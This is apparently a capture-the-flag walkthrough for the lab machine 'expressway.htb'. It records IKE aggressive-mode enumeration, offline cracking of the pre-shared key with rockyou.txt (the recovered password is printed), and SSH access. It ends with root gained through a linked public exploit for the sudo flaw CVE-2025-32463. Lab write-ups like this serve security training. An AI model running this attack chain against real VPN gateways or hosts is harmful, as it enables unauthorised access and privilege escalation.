Enum
First doing port scanning.
❯ nmap -sCV -T4 10.10.11.87Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-07 18:58 +0700Nmap scan report for expressway.htb (10.10.11.87)Host is up (0.061s latency).Not shown: 999 closed tcp ports (conn-refused)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelSeems only port 22 SSH open, i tried to rescan using UDP method.
sudo nmap -sU -p- --top-ports 200 10.10.11.87Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-07 18:59 +0700=PORT STATE SERVICE68/udp open|filtered dhcpc69/udp open|filtered tftp500/udp open isakmp4500/udp open|filtered nat-t-ikeLooks that port 500 isakmp are open.
Foothold
Using ike-scan.
❯ sudo ike-scan -M 10.10.11.87Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)10.10.11.87 Main Mode Handshake returned HDR=(CKY-R=37311a644b96bf83) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.084 seconds (11.94 hosts/sec). 1 returned handshake; 0 returned notifyTry to using aggresive mode.
❯ sudo ike-scan -M -A 10.10.11.87Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)10.10.11.87 Aggressive Mode Handshake returned HDR=(CKY-R=7758f632446e0796) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
Ending ike-scan 1.9.6: 1 hosts scanned in 0.110 seconds (9.07 hosts/sec). 1 returned handshake; 0 returned notifyLooks that any id user named ike@expressway.htb.
Try to extract using pskcrack.
sudo ike-scan -M -A 10.10.11.87 --pskcrack=output.txtNow brute the hash using hashcat, pskcrack or john, and the wordlists is rockyou.txt.
psk-crack -d /usr/share/dict/rockyou.txt output.txtStarting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)Running in dictionary cracking modekey "freakingrockstarontheroad" matches SHA1 hash c1dd8393403ec99db7270e5d49def7c1659dace9Ending psk-crack: 8045039 iterations in 46.258 seconds (173915.12 iterations/sec)Now we have SSH credentials, username ike@expressway.htb and the password is freakingrockstarontheroad. Try to access it.
ike@expressway:~$ lsuser.txtike@expressway:~$ cat user.txtike@expressway:~$Privilege Escalation
Try to run command sudo -l.
ike@expressway:~$ sudo -l
We trust you have received the usual lecture from the local SystemAdministrator. It usually boils down to these three things:
#1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility.
For security reasons, the password you type will not be visible.
Password:Sorry, try again.Seems like custom sudo. If we look at sudo location.
ike@expressway:~$ which sudo/usr/local/bin/sudoike@expressway:~$This not default sudo location.
ike@expressway:~$ sudo --versionSudo version 1.9.17Sudoers policy plugin version 1.9.17Sudoers file grammar version 50Sudoers I/O plugin version 1.9.17Sudoers audit plugin version 1.9.17Try to find public exploits.
obsidian://open?vault=projectidek&file=assets%2FPasted%20image%2020251207191642.png
CVE-2025-32463.
Using this exploit. https://github.com/kh4sh3i/CVE-2025-32463
Copy into the machine using SCP.
scp exploit.sh ike@expressway.htb:/tmpike@expressway.htb's password:exploit.shOpen the machine, run id command first to check user now.
ike@expressway:/tmp$ iduid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)ike@expressway:/tmp$ ./exploit.shwoot!root@expressway:/# iduid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)Pwned.
root@expressway:/# cat /root/root.txt